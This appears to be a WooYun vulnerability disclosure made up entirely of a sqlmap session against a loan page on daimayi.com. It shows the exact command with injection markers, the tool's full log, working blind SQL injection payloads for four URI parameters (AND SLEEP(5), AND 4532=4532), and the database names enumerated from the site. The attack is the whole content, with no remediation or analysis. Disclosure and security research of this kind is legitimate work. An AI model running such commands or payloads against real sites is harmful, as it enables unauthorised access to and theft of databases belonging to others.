WooYun.org

sqlmap.py -u "http://daimayi.com/index.php/Loan/index/s/1*/money/1*/deadline/3*/lt/1*/co_id/1*" --threads 10 --dbms "MySQL"

custom injection marking character ('*') found in option '-u'. Do you want to pr
ocess it? [Y/n/q] y
[00:21:43] [INFO] testing connection to the target URL
[00:21:48] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[00:21:53] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
 or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[00:21:55] [INFO] testing if URI parameter '#1*' is dynamic
[00:21:59] [WARNING] URI parameter '#1*' does not appear dynamic
[00:22:04] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might
 not be injectable
[00:22:04] [INFO] testing for SQL injection on URI parameter '#1*'
[00:22:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:23:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:23:58] [INFO] testing 'MySQL inline queries'
[00:24:02] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:24:02] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:24:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:25:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[00:31:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:37:26] [WARNING] URI parameter '#1*' is not injectable
[00:37:26] [INFO] testing if URI parameter '#2*' is dynamic
[00:37:31] [INFO] confirming that URI parameter '#2*' is dynamic
[00:37:35] [INFO] URI parameter '#2*' is dynamic
[00:37:36] [WARNING] heuristic (basic) test shows that URI parameter '#2*' might
 not be injectable
[00:37:36] [INFO] testing for SQL injection on URI parameter '#2*'
[00:37:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:37:38] [WARNING] reflective value(s) found and filtering out
[00:38:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:38:15] [INFO] testing 'MySQL inline queries'
[00:38:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:38:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:39:31] [INFO] URI parameter '#2*' seems to be 'MySQL > 5.0.11 AND time-based
 blind' injectable
[00:39:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:39:31] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[00:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:40:26] [INFO] checking if the injection point on URI parameter '#2*' is a fa
lse positive
URI parameter '#2*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:43:18] [INFO] testing if URI parameter '#3*' is dynamic
[00:43:23] [INFO] confirming that URI parameter '#3*' is dynamic
[00:43:28] [INFO] URI parameter '#3*' is dynamic
[00:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#3*' might
 not be injectable
[00:43:29] [INFO] testing for SQL injection on URI parameter '#3*'
[00:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:43:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:44:10] [INFO] testing 'MySQL inline queries'
[00:44:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:44:24] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:45:25] [INFO] URI parameter '#3*' seems to be 'MySQL > 5.0.11 AND time-based
 blind' injectable
[00:45:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:45:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:46:18] [INFO] checking if the injection point on URI parameter '#3*' is a fa
lse positive
URI parameter '#3*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:54:38] [INFO] testing if URI parameter '#4*' is dynamic
[00:54:42] [INFO] confirming that URI parameter '#4*' is dynamic
[00:54:47] [INFO] URI parameter '#4*' is dynamic
[00:54:48] [WARNING] heuristic (basic) test shows that URI parameter '#4*' might
 not be injectable
[00:54:48] [INFO] testing for SQL injection on URI parameter '#4*'
[00:54:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:55:08] [INFO] URI parameter '#4*' seems to be 'AND boolean-based blind - WHE
RE or HAVING clause' injectable
[00:55:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:55:09] [INFO] testing 'MySQL inline queries'
[00:55:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[00:55:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[00:56:15] [INFO] URI parameter '#4*' seems to be 'MySQL > 5.0.11 AND time-based
 blind' injectable
[00:56:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[00:56:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#4*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
[00:58:24] [INFO] testing if URI parameter '#5*' is dynamic
[00:58:31] [INFO] confirming that URI parameter '#5*' is dynamic
[00:58:36] [INFO] URI parameter '#5*' is dynamic
[00:58:43] [WARNING] heuristic (basic) test shows that URI parameter '#5*' might
 not be injectable
[00:58:43] [INFO] testing for SQL injection on URI parameter '#5*'
[00:58:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:59:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[00:59:56] [INFO] testing 'MySQL inline queries'
[01:00:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:00:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:01:16] [INFO] URI parameter '#5*' seems to be 'MySQL > 5.0.11 AND time-based
 blind' injectable
[01:01:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:01:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[01:02:09] [INFO] checking if the injection point on URI parameter '#5*' is a fa
lse positive
URI parameter '#5*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 470 HTTP(s) req
uests:
---
Place: URI
Parameter: #2*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1 AND SLEEP(5)
/deadline/3/lt/1/co_id/1
Place: URI
Parameter: #5*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1/co_id/1 AND SLEEP(5)
Place: URI
Parameter: #4*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1 AND 4532=4532/co_id/1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3/l
t/1 AND SLEEP(5)/co_id/1
Place: URI
Parameter: #3*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://daimayi.com:80/index.php/Loan/index/s/1/money/1/deadline/3 A
ND SLEEP(5)/lt/1/co_id/1
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: URI, parameter: #2*, type: Unescaped numeric (default)
[1] place: URI, parameter: #3*, type: Unescaped numeric
[2] place: URI, parameter: #4*, type: Unescaped numeric
[3] place: URI, parameter: #5*, type: Unescaped numeric
[q] Quit
> 0
[01:06:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

available databases [8]:
[*] daimayi
[*] huomayi
[*] information_schema
[*] mayishequ
[*] mysql
[*] myxd
[*] performance_schema
[*] test